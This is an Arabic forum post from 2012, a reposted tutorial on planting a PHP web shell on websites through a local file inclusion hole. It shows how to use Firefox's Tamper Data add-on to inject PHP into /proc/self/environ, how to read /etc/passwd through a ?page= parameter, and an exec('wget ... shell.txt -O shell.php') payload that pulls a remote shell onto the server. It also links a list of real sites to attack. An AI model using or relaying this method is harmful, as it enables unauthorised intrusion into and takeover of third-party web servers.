| |||||||
| | LinkBack  | أدوات الموضوع | انواع عرض الموضوع |
| |
06-04-2012, 04:41 PM
| رقم المشاركة : 1 (permalink) | ||
 رفع الشل من خلال ثغرات lif عبر Tamper Data السلام عليكم ورحمة الله وبركاتة كيفكم اخواني اتمنا الجميع بخير وصحة وعافية حبيت اطرح هاذا الشرح لجل الافادة واتمنا انه يفديكم المتطلبات 1. FireFox [download] 2. Tamper Data [download] والموقع المراد التطبيق علية انا جبت لكم كم موقع http://pastie.org/private/7fbtucb1obczki7nk0xvxa طيب نكمل في البداية لازم نقدر نقرى proc/self/environ  اضغط هنا لترى الصورة بحجمها الطبيعى بعد مايضبط الشغل نروح نشغل اداة تمبلر داتا  بعد ماتشتغل معنا الاداة نروح لم  بعدها نروح لم الموقع حقنا ونعمل تحديث وراح تخرج لن هل النافذة  بعدها نروح للمربع هاذا   في هاذا المربع وضعنا <?php phpinfo();?> عشان نقرة phpinfo ونضمن الشغل بعد ماتضغط اوك راح تخرج لك كم نافضة اضغط على الكل بعدها ماتضغط وتتخطى يفتح الموقع ويتم قراة phpinfo  ومنها راح نشوف ادوال والسيف مود وغيرها امر مهم قبل رفع الشل  <?exec('wget http://www.site.com/shell.txt -O shell.php');?> هاذي هي الدالة exec الي راح نسخدمها لسحب الملف طبعن تقدر تغيرها اذا كانت ممنوعه الى chmod system ومع شوي تطوير راح تضبط بعدها نروح نشوف راح يفتح الموقع مثل ماكان طيب لما تنتهي من الحقن مثال هل الموقع http://www.site.com/index.php?page=/etc/passwd نمسح index.php?page=/etc/passwd ونحط http://www.site.com/shell.php  وباذن الله راح يتم الرفع الشل منقول للفائده، vtu hgag lk oghg eyvhj lif ufv Tamper Data
| |||
|
|  |
| مواقع النشر (المفضلة) |
« الموضوع السابق
|
الموضوع التالي »
العرض الشجري
|
|
الساعة الآن 01:58 PM
SEO by vBSEO 3.6.0